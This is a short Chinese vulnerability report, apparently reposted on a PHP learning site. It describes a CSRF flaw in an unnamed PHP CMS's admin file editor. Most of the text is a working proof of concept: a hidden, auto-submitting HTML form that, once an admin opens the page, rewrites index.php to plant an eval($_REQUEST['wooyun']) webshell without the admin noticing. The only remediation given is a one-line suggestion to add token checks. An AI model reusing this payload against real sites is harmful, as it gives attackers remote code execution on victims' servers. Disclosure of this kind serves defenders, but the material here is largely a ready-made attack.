来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 无token,所以可以通过交互管理员进行Csrf-getshell,全程只需要管理员点击一个网页,不知不觉getshell就自动完成了。后台有编辑文件功能,可以编辑php文件,植入一句话。且此功能无to...
|
无token,所以可以通过交互管理员进行Csrf-getshell,全程只需要管理员点击一个网页,不知不觉getshell就自动完成了。
后台有编辑文件功能,可以编辑php文件,植入一句话。 且此功能无token限制,导致可以通过一个Csrf交互来getshell.
POC如下(如运行不正常,为乌云编辑器所致,将中间的空行删去即可):
<form action="http://127.0.0.1/admin/admin.php" method="POST" target="hidden_frame">
<input type="hidden" name="filedata" value="<?php
@eval($_REQUEST['wooyun']);
include
('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER
['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path,
0,1)=='/'){
$path=substr($path,1);
}
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET
['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::$ctrl($path);
}
?>" />
<input type="hidden" name="input" value="index.php" />
<input type="hidden" name="name" value="index.php" />
<input type="hidden" name="action" value="file" />
<input type="hidden" name="ctrl" value="save" />
<input type="hidden" name="path" value="index.php" />
</form><iframe style="DISPLAY: none" id=hidden_frame name=hidden_frame></iframe>
<script>
document.forms[0].submit();
</script>
页面上只是一段简单的文字,但是其实后台已经发起了一次POST请求,在index.php中植入了一句话木马。 ![]() ![]() ![]() 修复方案:
后台增加token验证 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com